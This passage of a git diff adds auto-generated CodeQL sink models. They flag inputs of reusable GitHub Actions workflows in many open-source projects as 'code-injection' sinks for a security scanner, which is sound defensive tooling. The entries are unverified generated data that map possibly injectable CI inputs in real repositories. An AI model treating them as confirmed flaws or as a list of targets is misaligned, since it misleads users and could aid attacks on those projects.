["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml new file mode 100644 index 00000000000..cba6c4fbe5a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml new file mode 100644 index 00000000000..448d48f661d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml new file mode 100644 index 00000000000..50eb3b1af36 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml new file mode 100644 index 00000000000..780fa92d20c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml new file mode 100644 index 00000000000..275d46772a2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml new file mode 100644 index 00000000000..271c80c575e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml new file mode 100644 index 00000000000..0f4ad0a7ca7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml new file mode 100644 index 00000000000..c38ae925860 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml new file mode 100644 index 00000000000..fd4697ac1c4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml new file mode 100644 index 00000000000..90c4c20b585 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml new file mode 100644 index 00000000000..51d99171a54 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml new file mode 100644 index 00000000000..8e74c9b811d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml new file mode 100644 index 00000000000..cd7de6d5786 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml new file mode 100644 index 00000000000..ecea4012c75 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 00000000000..f8ee5402a92 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml new file mode 100644 index 00000000000..aa76014db32 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml new file mode 100644 index 00000000000..e52ce3c8318 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml new file mode 100644 index 00000000000..31f24a27268 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml new file mode 100644 index 00000000000..4ace66c79c3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml new file mode 100644 index 00000000000..44518d6a348 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml new file mode 100644 index 00000000000..c0edbfae484 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml new file mode 100644 index 00000000000..a28ffce30f7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml new file mode 100644 index 00000000000..afe2daa172e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml new file mode 100644 index 00000000000..a07044c0ccc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml new file mode 100644 index 00000000000..250307e3acd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml new file mode 100644 index 00000000000..e968f209706 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml new file mode 100644 index 00000000000..438f637a9a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml new file mode 100644 index 00000000000..7e7b82b25f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml new file mode 100644 index 00000000000..e3c3b19e441 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml new file mode 100644 index 00000000000..704adb3f121 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml new file mode 100644 index 00000000000..5300a7d145e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml new file mode 100644 index 00000000000..f82254bd22b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml new file mode 100644 index 00000000000..80a26a9e65f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml new file mode 100644 index 00000000000..eb5e7835565 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml new file mode 100644 index 00000000000..cd2629f49bc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml new file mode 100644 index 00000000000..77ad5d6a6d3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml new file mode 100644 index 00000000000..a881a1a5fd3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml new file mode 100644 index 00000000000..693d3abc03e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml new file mode 100644 index 00000000000..119cbe465e6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml new file mode 100644 index 00000000000..2d35b933923 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml new file mode 100644 index 00000000000..7ca34fc3e44 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml new file mode 100644 index 